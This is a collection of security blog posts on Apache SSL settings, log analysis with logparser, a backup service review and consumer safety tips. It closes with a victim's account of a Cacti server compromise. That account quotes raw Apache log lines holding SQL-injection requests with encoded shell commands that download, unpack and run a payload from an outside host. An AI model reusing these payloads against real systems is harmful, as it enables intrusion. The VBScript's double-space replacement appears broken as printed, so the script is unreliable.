Recently in Security Category

So you want to require strong encryption in Apache's httpd 2.0? So strong that Firefox is the only browser that can connect?
In /etc/httpd/conf.d/ssl.conf, edit the two lines as below:
SSLProtocol TLSv1
SSLCipherSuite HIGH
Then go to
/etc/httpd/conf/httpd.conf and edit your

<Directory> </Directory> 

to include the following line:
SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 256
Then
apachectl configtest
to check for typos.
Finally
/etc/rc.d/init.d/httpd restart

What this does is make browsers do
TLSv1 DHE-RSA-CAMELLIA256-SHA only.

You can then watch your SSL handshakes fail from IE and Chrome. If you want to require strong encryption across browsers, edit ssl.conf to look like this:

SSLProtocol TLSv1
SSLCipherSuite AES256-SHA

Then you'll have reasonably strong encryption.

Working with Bluecoat files in the raw can be time-consuming. Findstr and grep only work so fast. Windows grep is slow. I know SQL syntax OK, so I tend to dump logfiles into databases to analyze them for activity. There are certainly other ways to do it, such as using a reporting tool for Bluecoat. (Splunk's free Bluecoat application, e.g.).

Theoretically, Bluecoat logfiles are the same as W3C web server log files that logparser can consume via the -i:W3C directive.

You can see the fields in a Bluecoat log below.

#Fields: date time time-taken c-ip cs-username cs-auth-group x-exception-id sc-filter-result cs-categories cs(Referer) sc-status s-action cs-method rs(Content-Type) cs-uri-scheme cs-host cs-uri-port cs-uri-path cs-uri-query cs-uri-extension cs(User-Agent) s-ip sc-bytes cs-bytes x-virus-id

For some reason, Bluecoat leaves two spaces between cs(Referrer) and sc-Status, so all the columns to the right of sc(Referrer) past that will be one off. BlueCoat also leaves spaces in cs-categories and surrounds them with quotation marks, so you need to specify -dQuotes:on. Logparser doesn't have a quick and easy way to handle the double-spaces issue, so I wrote a VB Script to handle it. (VBScript is pretty quick at text handling and it's much faster than using search and replace in WordPad or Notepad on a 500-1000 MB File.)

Here's the VBScript:
'start

Set objFSO = CreateObject("Scripting.FileSystemObject")
'change this line to wherever you want to read the input from.
Set objTextFile = objFSO.OpenTextFile("c:\myBluecoatlog.log",1)
Set objNewFile = objFSO.CreateTextFile("c:\myCleanBlueCoatlog.log")
Do Until objTextFile.AtEndOfStream

myString = objTextFile.Readline
objNewFile.WriteLine(Replace (myString, " ", " "))
Loop
'end vbscript
Here's the logparser file:
-------------------start
SELECT TO_LOCALTIME(TO_TIMESTAMP(date, time)) AS date,
time-taken,
c-ip,
cs-username,
cs-auth-group,
x-exception-id,
sc-filter-result,
cs-categories,
cs(Referer) AS Referer,
sc-status AS scStatus,
s-action,
cs-method,
rs(Content-Type) AS ContentType,
cs-uri-scheme,
cs-host,
cs-uri-port,
cs-uri-path,
cs-uri-query,
cs-uri-extension,
cs(User-Agent) AS UserAgent,
s-ip,
sc-bytes,
cs-bytes,
x-virus-id

INTO BlueCoat4
FROM c:\myCleanBlueCoatlog.log
------------------end
And here's the command line for logparser. (Save the logparser file as c:\scripts\log\bluecoat.sql)

logparser file:c:\scripts\log\bluecoat.sql -i:W3C -o:SQL -server:sqlservername -database:BLUECOAT -createtable:ON -dQuotes:ON

Statistics:
-----------

Elements processed: 613076
Elements output: 613076
Execution time: 241.20 seconds (00:04:1.20)
About 2500 lines/sec. Processor utilization is almost zero for SQL and logparser, so it's all about disk time.

The above is from a file that's 310,935,417 bytes large. That means BlueCoat logs are about 507 bytes per line, or 0.5k per line before compression. The last time I checked BlueCoat gz compression, it was about 15% of the original file size. Compressed, the line would cost you 76 bytes.

Niether did I. Hardly anyone knows, because few people take DHS seriously, and nobody outside of the Federal government has said "Cyber" since the nineties. I attended a computer security conference recently and listened to a panel of current and former federal officials speak about "Cyber" security. They might one day be able to secure government systems, but they're a long way off from protecting you and me online. One of the few things they can do to protect us is to stage a public awareness campaign -- thus we have Cybersecurity Awareness Month.

Why doesn't Google have a Cybersecurity graphic? Online providers don't want you to think about security. Banks don't want you to think about online security. If you thought about security when you signed up for online banking, you might not do it. Without the regulatory agencies, the banks would leave you liable for all losses -- event those caused by the bank's own security lapses, as happened in the UK.

A banking-industry consultant at the same conference said two striking things:

1. Bank marketers fought tooth and nail against FFIEC regulations requiring two-factor authentication for online banking logons. (That means you need your password AND something else to log on.) Banking marketers want to make easy for you (or a hacker) to log on and transfer funds.


2. Banking customer service representatives are just as dumb as the customers when it comes to online security.

If your bank account gets hacked, your bank isn't going to be of much help. They might get some money back, but in most cases, they won't. Your money's gone. The same goes for any other account of yours that gets hacked, whether it's Facebook, GMail, or Yahoo. Nobody's going to help you much.

So take the time now to do a few things to ensure your online security.

1. Use antivirus and make sure it's up to date. If you're on Windows, there are several free antivirus packages available, such as Microsoft Security Essentials , Avast , and Avira . Password-stealing viruses infect computers every day. If you want to tweak out on antivirus effectiveness comparisons, go here.


2. Patch your computer. It doesn't matter if you're windows, mac, unix, linux or bsd. Patch.


3. Change your banking password. Change your email password, because all your password resets go there. Change your security questions, because those reset your passwords. If you're using the same password from college, and your college system gets hacked and reveals your password, then they will find your other accounts.


4. Realize that you are a hundred times more likely to fall for a phishing email than you are to click on an online ad. (Phishing emails are now so common that you might get one that coincides with a recent transaction, making you think it's real.) Now that banks have increased their online security, the hackers are targeting you -- the soft spot.


5. Also realize there are are now office buildings full of professional hackers working in shifts trying to get to your money. (Another panelist, Chris Roberts, talked about research he had done observing the building in an unnamed country in Eastern Europe. Some of his work is available on McAfee's hacker-commerce site.)


6. Don't use unsecured wireless networks. Secure your home wireless network. (Replace WEP encryption with WPA or WPA2.)
   

Just because disk space is getting cheap, don't think that storage is cheap. A referral from Slashdot to Backblaze's blog charted the situation out accurately. The cost of a petabyte of storage on raw SATA hard drives is $81,000. On Amazon and EMC, it's $2.8 million. If Backblaze really could create their own enterprise storage devices, then it would be possible to offer backups at $5/month for unlimited storage. Backblaze even offers a 15-day free trial, so I tried it, although I was skeptical.

Catches:
1) You need to use their client.
2) Their client doesn't run on Windows Server or Linux -- just WinXP, Vista, and Macintosh. (Even if you run the installer in XP compatible mode on Windows server, it still doesn't install.)
3) The $5/month is for one computer, not all the computers in my house.
4) rsync doens't work with Windows/samba shares. (You may, however, be able to get rsync to work to a Macintosh. I haven't tested yet.) (Update below: you can install an NFS server onto WindowsXP/Vista to get rsync to work, or you could do it from Windows via an SSH rsync script.)

Solution: I installed it on a Vista workstation, created a share, and copied the few things I really need backed up to it. I also wrote scripts to transfer my PBX backups to my backup and log host and then copy the files from the backup server to the windows share via smbclient. I'll skip the part about configuring password-less logins for SSH via ssh-keygen keys, as well as the kinit for logging into windows via smbclient. (I also never was able to mount.cifs via kinit, just smbclient.)

So what happened when I tried to back up 15 GB on my Vista box to Backblaze? Not much -- the files just transferred. iPod library -- check. Photos -- check. My mrtg indicated that bandwidth increased to about 310 kbps for four days. I was still able to make phone calls via my SIP trunk to vitelity with no problems. (g729 to my SIP provider and alaw to my friends' PBX servers via IPSec VPN.)

Bandwidth used:
`Weekly' Graph (30 Minute Average)

Max Average Current
In 501.9 kb/s (0.5%) 56.4 kb/s (0.1%) 47.9 kb/s (0.0%)
Out 1360.2 kb/s (1.4%) 168.6 kb/s (0.2%) 29.3 kb/s (0.0%)

Security comments: Backblaze says it encrypts files, but doesn't offer details on the algorithm or implementation. (e.g AES-CBC, etc.) Backblaze does offer you the option of using a private key, so that only you (assuming you don't forget the key) can access your files.

My advice: If it needs to stay secure, encrypt the files yourself before they hit the local hard disk. You can even do a loopback mount (Super-awesome tutorial there) to an AES-encrypted file on a samba share, and rsync will work, but the whole file will change, requiring it all to be sent to Backblaze.

Update: You can use rsync to get your Linux/BSD/Unix files over to your windows box, but you'll need to install an NFS Server on your windows box. You could also use Microsoft's Services for Unix, but it's easier just using the Allegro server.

To find account lockout events on multiple domain controllers, download logparser 2.2 and execute the following command in a domain admin context (e.g. runas user:domain\administrator logparser.exe), where the part below the command is in "lockouts.sql". The account lockout event is 644 -- if you need to find others, read Microsoft's KB174074 Also, this script will access each domain controller's security event log sequentially, so if you're in a hurry, execute several different logparser processes for each domain controller.

logparser.exe file:c:\scripts\logparser\lockouts.sql -i:EVT -o:datagrid

------stick this part in lockouts.sql
SELECT
timegenerated AS LogonTime,
extract_token(strings, 0, '|') AS UserName,
message as Message
FROM \\domaincontroller1\security, \\domaincontroller2\security, \\domaincontrolle2\Security
WHERE EventID = 644
-----end here

If you want the output to go into a database instead of a datagrid (Excel-type) table, make the logparser command look like this:

logparser.exe file:c:\scripts\logparser\lockouts.sql -o:SQL -server:myDBservername driver:"SQL Server" -database:myDBname -createtable:ON

Table name will end up matching your dbname. Set -createtable to off after you run it once.

Props to: Microsoft's Log Parser Toolkit, by Gabriele Giuseppini and Mark Burnett.

If you're going to be doing anything with windows logs, buy the book. It's more useful than several log management software packages I've demo'ed.

Download Log Parser here.

I had 41,000 spam comments in my photo gallery. I had thousands of unpublished spams on my blog here. Spam comments were showing up as valid keywords attracting traffic on Google searches. So a couple of weeks ago, I shut down commenting in MovableType. It turns out that one other problem, mt.cgi consuming 2 G of RAM and all my processor time, was a separate issue. ImageMagick is NOT optional in MT 4.2. I had installed it, but MT couldn't find it. Thus an infinite loop consumed all my resources through our favorite cgi-bin, mt.cgi. Fixed that, but what about comments?

I didn't think Gallery was popular enough to be targeted by automated scripts. I thought CAPTCHAs could stop them. I was quite wrong. I upgrade Gallery to 2.3 and got me a WordPress API key for Akismet, which I'm now using in MT and Gallery.

I also looked at my logs, and found that 99% of my Gallery spam comments came from a limited set of IPs. Since I started blocking them at the firewall, I've seen 13,000 attempted hits from them. Here they are. If you're running Gallery, ban them now.

Secunia says Cacti has four known vulnerabilities. I had forgotten that I had installed Cacti when I was trying to count the pages I had printed and compare those results those from my HP printer. Same IP as my computer was IRCing to. I should start tracking changes so I can have a record of what was changed, when it was changed, and if I granted myself access.

Here's the log files from apache:

213.189.5.233 - - [21/May/2007:14:44:14 -0400] "GET /cacti/ HTTP/1.0" 200 1327 "-" "-"
213.189.5.233 - - [22/May/2007:04:08:21 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,119,103,101,116,32,104,116,116,112,58,47,47,105,99,101,109,97,110,46,109,97,114,116,101,46,114,111,47,103,46,106,112,103,32,45,79,32,47,116,109,112,47,103,46,106,112,103,59,116,97,114,32,120,122,118,102,32,47,116,109,112,47,103,46,106,112,103,32,45,67,32,47,116,109,112,59,47,116,109,112,47,103,111,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:07 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,102,101,116,99,104,32,45,111,32,47,116,109,112,47,103,111,46,106,112,103,32,104,116,116,112,58,47,47,105,99,101,109,97,110,46,109,97,114,116,101,46,114,111,47,103,111,46,106,112,103,59,116,97,114,32,120,122,118,102,32,47,116,109,112,47,103,111,46,106,112,103,32,45,67,32,47,116,109,112,59,47,116,109,112,47,103,111,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:09 -0400] "GET /cacti/rra/suntzu.log HTTP/1.0" 404 296 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:09 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(114,109,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"

Apparently, that was all it took for my server to be compromised.

Also, I saved the tcpdump from my previous post as an HTML file for people that had trouble with it.